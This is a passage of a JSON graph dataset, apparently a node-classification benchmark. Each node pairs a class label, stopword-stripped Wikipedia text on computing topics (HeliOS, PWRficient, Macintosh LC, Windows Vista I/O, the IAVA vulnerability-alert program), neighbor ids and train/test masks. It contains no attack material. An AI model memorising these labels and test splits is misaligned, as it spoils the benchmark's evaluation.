      5492,
      11030,
      823,
      1304,
      3323,
      5599
    ],
    "mask": "Test"
  },
  {
    "node_id": 1561,
    "label": 2,
    "text": "HeliOS:helios helios discontinued unix-like operating system parallel computers developed published perihelion software primary architecture transputer helios microkernel implemented distributed namespace messaging protocol services accessed posix compatibility library enabled use unix application software system provided usual unix utilities work helios began autumn 1986 success limited commercial failure transputer efforts move architectures met limited success perihelion ceased trading 1998 early 1980s tim king joined metacomco university bath bringing rights operating system called tripos metacomco secured contract commodore work amigaos amigados component derived tripos 1986 king left metacomco found perihelion software began development parallel operating system initially targeted inmos transputer series processors helios extended tripos use light-weight message passing architecture networked parallel machines helios 1.0 first commercial release summer 1988 followed version 1.1 autumn 1989 1.1a early 1990 1.2 december 1990 followed 1.2.1 1.2.2 updates version 1.3 significant upgrade numerous utility library server driver improvements last commercial release 1.3.1 later tim king nick garnett gave permission release sources gnu public license v3 helios designed network multiple nodes connected multiple high-bandwidth communications links nodes could dedicated processing nodes processors attached i/o devices small systems might consist host pc workstation connected set several processing nodes larger systems might hundreds processing nodes supported dedicated nodes storage graphics user terminals helios network requires least one i/o server node able provide file system server console server reset control processing nodes power helios nucleus bootstrapped i/o server network node booted using small first-stage loader downloads initialises nucleus proper running node communicates neighbours booting turn required helios nucleus composed kernel libraries loader service processor manager service helios kernel effectively micro-kernel providing minimal abstraction hardware services implemented non-privileged server processes provides memory allocation process management message passing synchronisation primitives helios nucleus contains three libraries system server utility libraries utility library provides basic library routines c programming shared libraries system library provides basic kernel interface converting c function calls messages sent kernel implements abstraction allows communication processes regardless location network server library provides name space support functions writing helios servers described remaining components nucleus loader processor manager servers kernel loaded processes bootstrapped integrate newly running node helios network key feature helios distributed name system helios network implements single unified name space virtual root node optional virtual network structuring nodes nodes processor sub-processor name spaces provided services names similar unix using forward slash separating character textual naming elements name space managed network server started i/o server nucleus booted first attached node network server uses provided network map allocate processor names initialise drivers hardware devices specific nodes network kernel includes name resolver manages local cache routes previously resolved names servers helios processes implement general server protocol typically support server library server protocol conceptually similar unix vfs api closely plan 9 9p requires servers represent resources files standardised open/read/write/close-style operations similar facilities /proc plan 9 unix-like operating systems resources files i/o devices users processes represented virtual files namespace served managing process key servers helios previously mentioned loader processor manager network server together session manager window server file server others include keyboard mouse rs232 centronics servers built host i/o server null server like unix /dev/null logger server like unix syslog user perspective helios quite similar unix usual utility programs provided extensions reflect availability multiple machines immediately apparent helios extends notion unix pipes language called component distribution language cdl cdl typical unix shell pipeline ls called task force transparently distributed task force manager server across available cpus cdl extended traditional unix syntax additional operators bi-directional pipes sequential parallel process farm operators load balancing resource management helios applications written using c c++ fortran modula-2 posix library assists porting existing unix software provides familiar environment programmers helios support programs written occam programming language helios predominantly operating system transputer systems supported products various manufacturers including inmos tram systems meiko cs parsytec multicluster supercluster telmat t.node atari transputer workstation perhaps highest profile helios hardware least outside academia helios ran t4xx t8xx 32-bit transputers t2xx 16-bit models offered device drivers various scsi ethernet graphics hardware inmos transtech others later versions helios ported ti tms320c40 dsp arm architecture used active book tablet device",
    "neighbors": [
      6273,
      2179,
      6787,
      6412,
      6675,
      7187,
      5397,
      1304,
      6558,
      3487,
      9762,
      3241,
      7983,
      3248,
      8369,
      2995,
      8499,
      9141,
      823,
      9784,
      6075,
      9151,
      10436,
      9932,
      8410,
      6369,
      9964,
      5363,
      5492,
      2424,
      633,
      2811,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 1562,
    "label": 1,
    "text": "ModelRight:modelright modelright database design data modeling tool developed modelright inc used data modelers database developers database architects create visualize document databases entity relationship diagram erd modelright works",
    "neighbors": [
      8808,
      9177
    ],
    "mask": "Test"
  },
  {
    "node_id": 1563,
    "label": 3,
    "text": "PWRficient:pwrficient pwrficient name series microprocessors designed p.a semi pa6t-1682m one became actual product pwrficient processors comply 64-bit power isa designed high performance extreme power efficiency processors highly modular combined multi-core system-on-a-chip designs combining cpu northbridge southbridge functionality single processor die pa6t first processor core p.a semi offered two distinct lines products 16xxm dual core processors 13xxm/e single core processors pa6t lines differed l2 cache size memory controllers communication functionality cryptography offloading features one time p.a semi plans offer parts 16 cores pa6t core first power isa core designed scratch outside aim alliance i.e designed ibm motorola/freescale apple inc. ten years since texas instruments one investors p.a semi suggested fabrication plants would used manufacture pwrficient processors pwrficient processors initially shipped select customers february 2007 released worldwide sale q4 2007 p.a semi bought apple inc. april 2008 closed development pwrficient architecture processors however continue manufacture sell support components foreseeable future due agreement us government processors used military applications pwrficient processors comprise three parts pa6t conexium envoi",
    "neighbors": [
      3457,
      6914,
      4868,
      10501,
      3846,
      4743,
      6663,
      5642,
      1548,
      1933,
      398,
      6926,
      3472,
      4881,
      7065,
      8090,
      1309,
      6815,
      8355,
      3493,
      6949,
      6311,
      8102,
      1321,
      4139,
      10924,
      9391,
      10543,
      4017,
      5297,
      1461,
      8120,
      6715,
      9020,
      1725,
      1983,
      1985,
      10180,
      336,
      6608,
      8530,
      3540,
      342,
      9302,
      11613,
      6878,
      6495,
      1635,
      8035,
      869,
      8931,
      10214,
      10985,
      10734,
      1776,
      3185,
      4211,
      5235,
      630,
      8058,
      3323,
      8700
    ],
    "mask": "Test"
  },
  {
    "node_id": 1564,
    "label": 3,
    "text": "Master_of_Monsters:master monsters master monsters turn-based strategy game developed systemsoft msx nec pc8801 later ported variety consoles pcs including pc engine nec pc9801 sega mega drive genesis sega saturn playstation never garnered success systemsoft stablemate daisenryaku game garnered loyal following success north american market sega genesis proved sufficient sequel sega saturn anime art-style enhanced playstation version titled disciples gaia japanese role-playing game feel gameplay engages players permitting summon move monsters around board effort capture towers eventually defeat opponents controlled either humans computer program moves based hexagonal board structure every tile board adjacent six tiles notable features large variety monsters upgrading leveling veteran units control master character killed end game player focus game strategic despite fantasy-type characters might imply rpg element existence master character magic game gameplay similar system soft hardcore modern warfare strategic wargame series daisenryaku exception versions master monsters master monsters – final series allow equippable items weapons armor later lords chaos julian gollop mythos games shares many elements summoning tactics along earlier title chaos 1985 david white creator open-source turn-based strategy game battle wesnoth cited master monsters inspiration master monsters also compared later games role-playing video game series pokémon also revolves around commanding monsters real-time strategy game starcraft system soft alpha returned game strategy-based roots two entries master monsters series originally popularized nec 9801 pc updated system soft alpha new graphics gameplay features two sequels made japanese windows hark back deep strategic gameplay nec pc9801 versions opposed casual genesis playstation versions available japanese language windows-based systems remakes include マスターオブモンスターズiii special edition マスターオブモンスターズ4 ～光と闇の争覇～ master monsters value edition original game updated expansion packs added 真・マスターオブモンスターズ final spin-off game targeted towards younger audience titled masumon kids mobile version game available japan",
    "neighbors": [
      8355,
      6797,
      9006
    ],
    "mask": "None"
  },
  {
    "node_id": 1565,
    "label": 9,
    "text": "Judoscript:judoscript judoscript one several general purpose programming languages designed primarily scripting java platform originator primary developer software engineer james jianbo huang judoscript one first general purpose scripting languages designed specifically use java platform james jianbo huang originated judoscript initially collection several separate packages libraries domain specific languages originated use java platform j2ee enterprise applications huang designed judoscript provide globally simple intuitive scripting framework capable leveraging full suite java packages third-party extensions java foundation design strategy provide infrastructure 1 flexibility command shell 2 full interoperability access facilities java 3 simplified syntax intuitive developers necessarily java programmers design principles judoscript huang stated generally suitable enterprise-scale application development intended replace traditional java syntax example unlike beanshell scripting language judoscript many simplifying syntax constructs i.e. syntactic sugar available within traditional java syntax means code written judoscript expected compile java compiler without changes advantage gained trade-off judoscript allows specialized constructs designed specifically use given problem-domain obviates need bottom programming designed scratch using basic data structures custom-made algorithms admittedly bottom-up programming already obviated large part extensive availability standard third-party libraries within java platform problem according huang libraries often assume higher level experience java programming feasible practical given development requirements scripting applications example simple html scraping routine written loop",
    "neighbors": [
      1952,
      9345,
      10435,
      8582,
      8262,
      8554,
      5677,
      9780,
      9245
    ],
    "mask": "Test"
  },
  {
    "node_id": 1566,
    "label": 3,
    "text": "Genghis_Khan_II:_Clan_of_the_Gray_Wolf:genghis khan ii clan gray wolf genghis khan ii clan gray wolf originally released 1992 video game developed koei part koei historical simulation series games sequel genghis khan though third game series genghis khan ii developed published msx2 nintendo entertainment system dos x68000 pc-9801 pc-8801 mega drive/genesis super nes sega cd pc engine later playstation super nes version also made available wii virtual console north america june 8 2009 japan may 11 2010 player given option conquer either country mongolia temujin man would one day become genghis khan one three rivals region take known world time one several rulers throughout europe mainland asia north africa conquests made balance economy population buying selling manufactured goods family relations promoting demoting generals developing military turn-based fashion actions happen within given number turn points actions given priority others overlooked game also includes turn-based battle sequence allowing specific control player delegated general first scenario year 1184 ad mongolia player option controlling four different characters job become ruler mongolian steppes basically control mongolia end scenario beat 1212 ad take rest world fourth scenario world conquest get lead fight ruler chose choice eight generals advisor playable factions players also given option leading various nations worldwide scenarios nations suffer lack relatives generals significantly weaker leaders also absent ability hire elite mongol units largely viewed powerful units game scenario enables player take world part world known time including europe north africa mainland asia player select lead one several countries varying strengths weaknesses example occupying japan draft samurai japan starting point kamakura shogun korean version game player able play goryeo kingdom korean dynasty mongol invasions playable factions third scenario point yuan dynasty 1274 ad kublai khan ruler mongolia china trying rule world playable factions fourth scenario world conquest unlocked year 1185 ad 've successfully completed conquest mongolia first scenario ruler chose first scenario attempts take world mongol hordes scenario genghis khan default leader mongol empire eight best generals best advisor scenarios playable factions play player expect random events including typhoons droughts epidemics sand storms blizzards also bountiful harvests countries autumn important aspect game raise family choose daughter going marry succeed ruler dies case scenario without successors game strong family-oriented empire less susceptible revolutions us version game removed harem subgame entirely raised affinity one wives much like dating simulation game appointing one son general governor marrying one daughter already appointed general governor guarantees governor province rebel declare independence player empire especially important controlling large numbers provinces multiple governors may decide declare independence time governor declares independence new country formed state troops resources state become disposal rebellious general battle control province governor already established however peasant uprising player-controlled province computer chooses general command units troops governor province appointed governor must fight pitched battle control province peasant rebellion wins province troops defend general charge victorious army forms new country province electronic games reviewed snes version 1993 scored 83 computer gaming world 1994 rated pc version four stars five approving combining tactical strategic play strong non-cheating ai easy-to-learn game play lack bugs game reviewed 1995 dragon 213 jay dee eye monitor column reviewers uncertain rate game jay giving game 2½ maybe 3 5 stars dee giving 2 3",
    "neighbors": [
      10552,
      11477,
      9166
    ],
    "mask": "Test"
  },
  {
    "node_id": 1567,
    "label": 4,
    "text": "Information_assurance_vulnerability_alert:information assurance vulnerability alert information assurance vulnerability alert iava announcement computer application software operating system vulnerability notification form alerts bulletins technical advisories identified dod-cert division united states cyber command selected vulnerabilities mandated baseline minimum configuration hosts residing gig uscybercom analyzes vulnerability determines necessary beneficial department defense release iava implementation iava policy help ensure dod components take appropriate mitigating actions vulnerabilities avoid serious compromises dod computer system assets would potentially degrade mission performance combatant commands services agencies field activities required implement vulnerability notifications form alerts bulletins technical advisories uscybercom authority direct corrective actions may ultimately include disconnection enclave affected system enclave compliance iava program directives vulnerability response measures i.e communication tasking orders messages uscybercom coordinate affected organizations determine operational impact dod instituting disconnection february 15 1998 deputy secretary defense issued classified memorandum information assurance instructed disa assistance military departments develop alert system ensured positive control information assurance according memorandum alert system deputy secretary defense issued information assurance vulnerability alert iava policy memorandum december 30 1999 current events time demonstrated widely known vulnerabilities exist throughout dod networks potential severely degrade mission performance policy memorandum instructs disa develop maintain iava database system would ensure positive control mechanism system administrators receive acknowledge comply system vulnerability alert notifications iava policy requires component commands services agencies register report acknowledgement compliance iava database according policy memorandum compliance data reported include number assets affected number assets compliance number assets waivers",
    "neighbors": [
      3552,
      612,
      5636,
      7983,
      4820,
      2901,
      635,
      7388,
      5373,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 1568,
    "label": 9,
    "text": "Qalb_(programming_language):qalb programming language قلب transliterated qalb qlb alb functional programming language allowing programmer write programs completely arabic name means heart recursive acronym arabic meaning qlb programming language قلب لغة برمجة developed 2012 ramsey nasser computer scientist eyebeam art technology center new york city artistic endeavor response anglophone bias vast majority programming languages express fundamental concepts using english words syntax like lisp scheme consisting parenthesized lists keywords appropriate arabic terms program text laid right-to-left like arabic text language provides minimal set primitives defining functions conditionals looping list manipulation basic arithmetic expressions turing-complete fibonacci sequence conway game life implemented program text written arabic connecting strokes characters arabic script extended length possible align source code artistic patterns tradition arabic calligraphy javascript-based interpreter currently hosted herokuapp project forked github قول مرحبا يا عالم",
    "neighbors": [
      9345,
      10083,
      8262,
      6502,
      7627,
      8495,
      11221
    ],
    "mask": "Train"
  },
  {
    "node_id": 1569,
    "label": 1,
    "text": "DNA_Data_Bank_of_Japan:dna data bank japan dna data bank japan ddbj biological database collects dna sequences located national institute genetics nig shizuoka prefecture japan also member international nucleotide sequence database collaboration insdc exchanges data european molecular biology laboratory european bioinformatics institute genbank national center biotechnology information daily basis thus three databanks contain data given time ddbj began data bank activities 1986 nig remains nucleotide sequence data bank asia although ddbj mainly receives data japanese researchers accept data contributors country ddbj primarily funded japanese ministry education culture sports science technology mext ddbj international advisory committee consists nine members 3 members europe us japan committee advises ddbj maintenance management future plans year apart ddbj also international collaborative committee advises various technical issues related international collaboration consists working-level participants",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 1570,
    "label": 1,
    "text": "Basic_Resident_Registry_Network:basic resident registry network national registry japanese citizens ruled constitutional supreme court japan march 6 2008 amidst strong opposition percentage popularization smartcard called juki-card low ratio view system end failure registry contains following information citizen initial phase network started august 5 2002 implemented literally three statutes online government local government executive procedure june 7 2003 full operation august 25 2003 among 1,700 local governments japan two kunitachi tokyo yamatsuri fukushima refused join network may 2009 registry opposed democratic party japan liberal party japanese communist party social democratic party",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 1571,
    "label": 3,
    "text": "Raid_on_Bungeling_Bay:raid bungeling bay raid bungeling bay first video game designed wright published broderbund commodore 64 1984 ported msx 1985 nes 1987 commodore 64 version published uk ariolasoft nes version japan hudson soft game would inspire wright develop simcity raid bungeling bay 2d war zone shoot 'em player controls helicopter launched aircraft carrier bomb six factories scattered across islands small planetoid occupied bungeling empire frequent villains broderbund games fending escalating counterattacks gun turrets fighter jets guided missiles battleship also hidden island player reload failure means bungeling empire develops war machine take planet earth players attack infrastructure defending aircraft carrier served home base game offers insight design style wright would later go design simcity time factories grow develop new technologies use player also visible signs interdependency among islands supply boats moving order win game player must prevent escalation bombing factories quickly possible keeping advancing technology left alone long factories create enough new weaponry overwhelm player compute wrote 1985 raid possesses virtues needed appease demanding gamer amazingly detailed graphics computer gaming world 1988 approved nintendo version graphics calling high adventure realistic overtones involve dragons elves magazine named action-strategy game year nintendo writing raid rescued broderbund computer software vaults updated slightly sent challenge bright new nintendo games blew water ... delightful game experience 1996 computer gaming world declared raid bungeling bay 24th-best computer game ever released commodore 64 version sold 20,000 30,000 units us nes version sold million units japan large discrepancy attributed lack piracy nes due cartridge system along raid bungeling bay one first american games published japan sales game gave wright financial freedom create simcity wright continued develop editor game personal toy enjoyed much researched urban planning realised others might enjoy constructing building cities result advanced simulation eventually became simcity",
    "neighbors": [
      5388,
      9006,
      1599
    ],
    "mask": "Test"
  },
  {
    "node_id": 1572,
    "label": 9,
    "text": "Baby_Modula-3:baby modula-3 baby modula-3 functional programming sublanguage modula-3 safe subset programming language based ideals invented martín abadi object oriented language studying programming language design one part implicitly prototype-oriented programming language explicitly statically typed designed studying computer science type theories checked formal language metaprogramming systems comes scandinavian school object-oriented programming languages martín abadi tried give example pure object-oriented language would allow studying formal semantics objects baby modula-3 defined structured operational semantics set static type rules denotational semantics guarantees soundness definition object model shown well definiteness decidability mechanical proof n't known inventor baby modula-3 worked systems research center src digital equipment corporation dec palo alto california dec bought compaq compaq bought hewlett-packard src-report 95 made available public hp luca cardelli martín abadi wrote book theory objects 1997 laying formal calculi semantics object-oriented programming languages baby modula-3 influenced work according luca cardelli guided calculus type self types object type 'self opened way work modula-3 formal semantic checking systems object oriented type system programming languages used model formal semantics programming languages ada programming language c programming language",
    "neighbors": [
      261,
      8262,
      5384,
      428,
      4341,
      2045,
      9535
    ],
    "mask": "Test"
  },
  {
    "node_id": 1573,
    "label": 4,
    "text": "Window_Snyder:window snyder mwende window snyder born 1975 american computer security expert previously top security officer intel fastly apple mozilla corporation co-author threat modeling standard manual application security snyder daughter american father kenyan-born mother wayua muasa goes middle name window first name used family members graduated choate rosemary hall 1993 served board snyder director security architecture stake senior security strategist microsoft security engineering communications organization notably security lead signoff microsoft windows xp service pack 2 windows server 2003 also created blue hat microsoft hacker conference leaving microsoft 2005 worked principal founder cto matasano security joined mozilla september 2006 10 december 2008 snyder said would leaving mozilla corporation end year 1 march 2010 snyder began work apple inc 2015 snyder became chief security officer content distribution network fastly intel software services group senior vice president general manager doug fisher announced july 2018 snyder would become company platforms security division chief security officer vice president general manager since left intel may 2019 joined square inc may 2017 snyder spoke next generation threats held techworld idg stockholm sweden april 2017 snyder keynote speaker hitbsecconf held hack box amsterdam november 2017 snyder spoke o'reilly security conference april 2018 spoke rsa conference august 2018 snyder keynote speaker open source summit held linux foundation",
    "neighbors": [
      5512,
      4074,
      4011,
      1453,
      1525,
      7899,
      5404,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 1574,
    "label": 2,
    "text": "AdJ:adj adj aprendiendo de jesús distribution openbsd spanish speakers source code available github learn install challenge p2pu version based corresponding version sources openbsd distribution cited number independent authors",
    "neighbors": [
      7552,
      10016,
      9320,
      5067,
      5356,
      5363,
      788,
      5397,
      11221,
      7483,
      9151
    ],
    "mask": "Test"
  },
  {
    "node_id": 1575,
    "label": 2,
    "text": "RNDIS:rndis remote network driver interface specification rndis microsoft proprietary protocol used mostly top usb provides virtual ethernet link versions windows linux freebsd operating systems partial rndis specification available microsoft windows implementations observed issue requests included specification undocumented constraints protocol tightly coupled microsoft programming interfaces models notably network driver interface specification ndis alien operating systems windows complicates implementing rndis non-microsoft operating systems linux freebsd netbsd openbsd implement rndis natively usb implementers forum usb-if defines least three non-proprietary usb communications device class usb cdc protocols comparable virtual ethernet functionality one cdc-ecm predates rndis widely used interoperability non-microsoft operating systems work windows versions android include rndis usb functionality recent versions nexus 6p september 2016",
    "neighbors": [
      8080,
      6797,
      10079,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 1576,
    "label": 3,
    "text": "Macintosh_LC_family:macintosh lc family macintosh lc family personal computers designed manufactured sold apple computer inc. 1990 1997 introduced alongside macintosh iisi macintosh classic part new wave lower-priced macintosh computers lc offered overall performance macintosh ii half price part apple goal produce machine could sold school boards price apple ii original macintosh lc introduced october 1990 updates form lc ii lc iii 1992 early 1993 early models shared pizza box form factor joined macintosh lc 500 series all-in-one desktop machines mid-1993 total twelve different lc models produced company last power macintosh 5300 lc sale early 1997 apple co-founder steve jobs left apple 1985 product development handed jean-louis gassée formerly manager apple france gassée consistently pushed apple product line two directions towards openness terms expandability interoperability towards higher price gassée long argued apple market computers towards low end market profits thin instead concentrate high end higher profit margins illustrated concept using graph showing price/performance ratio computers low-power low-cost machines lower left high-power high-cost machines upper right high-right goal became mantra among upper management said fifty-five die referring gassée goal 55 percent profit margin policy led series ever expensive computers spite strenuous objections within company group claris started low-end mac project called drama gassée actively killed elsewhere company two engineers h.l cheung paul baker working secret pet project color macintosh prototype called spin idea produce low-cost system vein apple ii product cheung previously worked apple head design machine would effect significantly smaller macintosh ii built-in video nubus expansion matching rgb monitor similar one introduced apple iigs year prior project changed direction development executives dictating machine video capabilities processing power similar macintosh iici also development time early 1989 prototype shown apple executives liked project felt different enough existing models justify effort project shut around time apple ceo john sculley facing public scrutiny declining sales blamed large part company lack inexpensive macintosh computer amidst promises press investors new low-cost macintosh way revived spin project goal creating lowest-priced macintosh possible gassée pleaded team keep color feature project product known internally new code name elsie homonym lc i.e low-cost color name computer would later sold elsie prototypes point resembled apple iic keyboard integrated unit single 800 kb floppy drive hard drive team ended problem — machine cheap n't good computer especially 68000 cpu powerful enough display color graphics acceptable performance april 1989 decided split project three computers -- macintosh iisi would powerful 68030 cpu macintosh classic would use black white display lc would use 68020 cpu macintosh ii keep price apple cut corners performance features redesigned components less expensive example external floppy connector included iisi classic excluded lc would save couple dollars connector integrated keyboard also dropped point replaced newly designed keyboard called apple keyboard ii macintosh lc introduced market alongside macintosh classic repackaging older macintosh plus macintosh iisi new entry-level machine macintosh ii series due pent-up demand low-cost color macintosh lc strong seller 1992 original macintosh lc succeeded lc ii updated machine replaced lc motorola 68020 processor 68030 increased soldered memory 4 mb make suitable system 7 however retained original lc 16-bit system bus 10 mb ram limit 4 mb simms used extra 2 mb ram would inaccessible making performance roughly earlier model main benefit 030 processor lc ii ability use system 7 virtual memory feature spite new model sold even better lc computer gaming world 1990 criticized lc expensive stating consumers would prefer 2,000 ibm ps/1 vga graphics 3,000 lc color monitor although classic popular first may 1992 lc 560,000 sold outselling classic 1.2 million half lcs used homes schools apple claimed helped company regain educational market share lost inexpensive pc clones iie card used half schools lcs early 1993 apple introduced lc iii used 25 mhz version 68030 higher memory limit 36 mb instead 10 mb lc lc ii lc iii spawned whole series lc models later sold lc name education world consumers via traditional apple dealers performa consumer market via electronics stores department stores sears example lc 475 also known performa 475 last official lc power macintosh 5300/100 lc released august 1995 discontinued april 1996 lc 580 notable last desktop 680x0-based macintosh mid-1993 apple introduced macintosh lc 520 combined traditional all-in-one form factor popularized compact macintosh family technology platform lc iii became apple mainstream education-market macintosh featuring built-in 14 crt display cd-rom drive stereo speakers case similar recently-introduced macintosh color classic considerably larger heavier due larger screen bulging midsection house larger electronics four lc 500-series models released next two years 520 550 575 580 520 550 using different speeds motorola 68030 575 580 sharing 33mhz motorola 68lc040 processor differing rest hardware computers also sold consumer market department stores macintosh performa brand similar model numbers lc models particular became popular schools small footprint lack cable clutter durability apple also released macintosh tv variant lc/performa 520 branded lc uses black-coloured version lc 520 case logic board similar lc 550 tv tuner card compact color classic series shares many components able swap logic boards early 500 series machines power macintosh 5200 lc introduced april 1995 powerpc 603 cpu 75 mhz powerpc-based replacement lc 500 series august power macintosh 5300 lc released kept motherboard design included powerful powerpc 603e cpu well director edition similar design features macintosh tv unlike previous education models prepended model number lc 5200 5300 models use power macintosh designation apple main workstation line time lc appended end 5300 lc final model branded lc sale early 1997 replacement power macintosh 5500 continued practice building education-specific models without distinctive branding except uk-only power macintosh one/225 company produce another education model brand name emac 2002",
    "neighbors": [
      9732,
      7697,
      4114,
      6165,
      11289,
      7706,
      8222,
      1057,
      6183,
      4139,
      7211,
      8253,
      1090,
      8783,
      4180,
      10838,
      10840,
      9312,
      9826,
      8806,
      6258,
      10357,
      7286,
      4220,
      10365,
      10878,
      6783,
      7299,
      4741,
      8842,
      6283,
      7824,
      147,
      7830,
      6807,
      4258,
      7842,
      7844,
      2735,
      4283,
      7869,
      8893,
      8896,
      4807,
      4810,
      1744,
      3293,
      9952,
      6884,
      6377,
      2282,
      1772,
      10481,
      1290,
      3338,
      781,
      4879,
      784,
      11539,
      8480,
      10023,
      4910,
      4399,
      11066,
      9022,
      1346,
      10562,
      8525,
      2388,
      8534,
      3928,
      8540,
      6495,
      8544,
      11629,
      11118,
      10608,
      9084,
      7549,
      11649,
      3977,
      6539,
      1428,
      3483,
      2979,
      8109,
      2492,
      446,
      7614,
      5058,
      10691,
      2502,
      456,
      1482,
      464,
      6608,
      8662,
      9174,
      9686,
      8665,
      10199,
      9182,
      2023,
      5616,
      6129,
      6130,
      2551,
      2553,
      8700,
      1534
    ],
    "mask": "Test"
  },
  {
    "node_id": 1577,
    "label": 2,
    "text": "Windows_Vista_I/O_technologies:windows vista i/o technologies windows vista introduced number new i/o functions microsoft windows line operating systems intended shorten time taken boot system improve responsiveness system improve reliability data storage vista modifies behavior asynchronous i/o operations new asynchronous i/o apis thread different one issued i/o request notified operation completes single thread issue i/o requests switch different worker thread thread one handles data i/o request completes thread-switch causes performance hit may avoided windows vista also introduces synchronous i/o cancellation synchronous i/o request application blocked request serviced fails windows vista application may issue cancellation request applications cancel operation user feedback may prefer enable user feedback time issuing thread suspended usability windows vista also implements i/o scheduling prioritized i/o disk i/o requests windows vista assigned priorities higher priority request given preferential treatment request lower priority execution request windows vista defines five priority classes – low low normal high critical default i/o requests assigned normal priority windows vista also allows reservation bandwidth per-application basis disk access aims guarantee required throughput rate application accesses disk features used windows media player respect media playback disk defragmenter superfetch windows defender windows search applications run startup use prioritized i/o prior windows vista i/o requests capped 64 kb thus larger operations completed chunks windows vista limit size i/o requests means entire i/o operation completed issuing fewer requests turn may lead higher performance windows explorer command prompt copy command modified issue 1 mb requests readyboost makes pcs running windows vista responsive using flash memory usb drive usb 2.0 3.0 sd card compact flash form flash memory order boost system performance device plugged windows autoplay dialog offers additional option use speed system additional readyboost tab added drive properties dialog amount space used configured windows readyboost also available windows 7 windows 10 flash memory devices formatted fat32 format need changed one wants properly utilize larger flash device readyboost one activates readyboost using windows autoplay reformatting device become impossible readyboost device disabled readydrive codenamed piton feature windows vista enables windows vista computers equipped hybrid drive flash memory caches intel turbo memory boot faster resume hibernation less time preserve battery power hybrid hard drives type hard disk integrates non-volatile flash memory traditional hard drive drive-side functionality expected standardized ata-8 hybrid hard drive installed windows vista machine operating system display new nv cache property tab part drive device properties within device manager reported eweek technology utilized full extent due lack hybrid drive-specific drivers hybrid drives instead delegated job device manufacturers however microsoft rebuffed suggestion providing specialized drivers hybrid systems also june 2006 david morgenstern wrote article eweek suggesting readydrive might sacrifice data integrity speed battery savings documentation microsoft however claims copy data always maintained hard disk question data loss even flash cache fails superfetch technology pre-loads commonly used applications memory reduce load times based prefetcher function windows xp superfetch attempts load commonly used libraries application components memory required continually analyzing application behavior usage patterns e.g applications typically used morning logon cache memory marked low priority meaning another process needs memory given default necessary files loaded main memory using feature called readyboost windows vista windows 7 use alternative storage usb flash drives thereby freeing main memory although hard disks usually higher sequential data transfer rates flash drives faster small files non-sequential i/o short random seek times offline files feature windows introduced windows 2000 maintains client-side cache files shared network locally caches shared files marked offline access uses cached copy whenever network connection remote files interrupted windows vista business enterprise ultimate editions contain significant improvements offline files beginning windows vista whenever connection restored open file handles cached copy redirected remote version without waiting cached files synchronized transition online offline back transparent clients using file local copy automatically synchronized remote copy reflect changes made either copy file file caching sync algorithm also completely rewritten determine differences faster synchronizing changes cached copy remote version bitmap differential transfer protocol used changed blocks cached version transferred also improves support caching large files entire file still downloaded retrieving changes remote copy files synchronized per-share basis encrypted per-user basis users force windows work offline mode online mode work offline/online button explorer sync manually sync center sync center also report sync errors resolve sync conflicts property page file folder offline files tab provides status allows control offline status file folder moreover even single file unavailable files share shares available transition share level instead server level offline files configurable group policy provide better interoperability dfs also comprehensive offline files management api available via com objects scriptability wmi windows vista also supports ghosting online files folders users make files directory available offline windows vista creates ghosted entries remaining unavailable items preserve online context offline files also feature slow-link mode enabled group policy always reads writes local cache improve performance slow network connection also possible windows vista specify limit total size local cache another sub-limit space used automatically cached files manually cached files never removed local cache even cache limit reached windows xp offline files could enabled fast user switching enabled restriction applied offline files synchronized log fast user switching completely log users windows vista restriction longer applies offline files runs windows service performs synchronization user opportune times logon offline online transitions synchronization occur continuously background occur log transactional ntfs abbreviated txf brings concept atomic transactions ntfs file system allowing windows application developers write file output routines guaranteed either completely succeed completely fail transactional ntfs allows files directories created renamed deleted atomically using transaction ensures correctness operation series file operations done transaction operation committed operations succeed case failure entire operation roll back fail number microsoft windows components updated make use shadow copy backup restore center windows vista later performs block-based backups full system backups file backup feature also uses shadow copy stores files inside zip files beginning windows vista shadow copy also used system protection component creates maintains periodic copies system user data local volume similar shadow copies shared folders feature windows server allows locally accessed system restore system restore allows reverting entire previous set shadow copies called restore point prior windows vista system restore based file-based filter watched changes certain set file extensions copied files overwritten additionally property sheet shell extension called previous versions allows restoring individual files folders locally restore point existed time snapshot thus retrieving earlier version file recovering file deleted mistake shadow copy created every time file changed backup copies created automatically per day manually triggered backup utility installer applications create restore point previous versions feature available business enterprise ultimate editions windows vista windows vista introduces ability independently redirect 10 user profile sub-folders network location also management console snap-in windows vista allow users configure folder redirection clients running windows vista windows xp windows 2000 windows vista service pack 1 introduced support exfat file system",
    "neighbors": [
      10243,
      5643,
      4624,
      10769,
      9234,
      1043,
      537,
      540,
      3102,
      1055,
      9762,
      2083,
      8227,
      3109,
      8740,
      1577,
      10281,
      1581,
      4143,
      9263,
      11316,
      1077,
      2101,
      8246,
      10812,
      3648,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      9813,
      10839,
      603,
      9819,
      8798,
      2145,
      3170,
      617,
      5225,
      622,
      9839,
      4210,
      7796,
      1656,
      5754,
      4731,
      5243,
      7290,
      9340,
      10879,
      5761,
      9348,
      5765,
      10886,
      2183,
      8328,
      8841,
      5259,
      653,
      6797,
      2193,
      9874,
      10900,
      3224,
      4248,
      9377,
      3235,
      4771,
      6820,
      7846,
      1703,
      2221,
      10414,
      5300,
      2749,
      8391,
      200,
      9420,
      3283,
      214,
      9943,
      2778,
      9434,
      2782,
      2783,
      736,
      4321,
      6370,
      9442,
      4836,
      4326,
      2279,
      1770,
      11498,
      3308,
      3821,
      10991,
      10993,
      2804,
      3834,
      1791,
      8959,
      11519,
      6927,
      3856,
      9491,
      3351,
      5401,
      5913,
      8473,
      8985,
      8988,
      11546,
      4384,
      9505,
      5413,
      2854,
      11559,
      5928,
      3881,
      10024,
      10026,
      10029,
      7983,
      11570,
      1844,
      9525,
      11572,
      10039,
      6972,
      4926,
      6462,
      5952,
      10048,
      3394,
      1348,
      844,
      3922,
      11605,
      4439,
      5465,
      10079,
      11616,
      2402,
      4458,
      6506,
      9593,
      2943,
      9609,
      1418,
      5003,
      5004,
      9612,
      8080,
      9114,
      11677,
      10654,
      8607,
      929,
      11683,
      430,
      6062,
      9655,
      6584,
      1978,
      2493,
      960,
      8132,
      6088,
      969,
      7629,
      3535,
      8659,
      1498,
      5594,
      478,
      8161,
      6114,
      6115,
      2027,
      9196,
      6637,
      4590,
      9709,
      11245,
      6641,
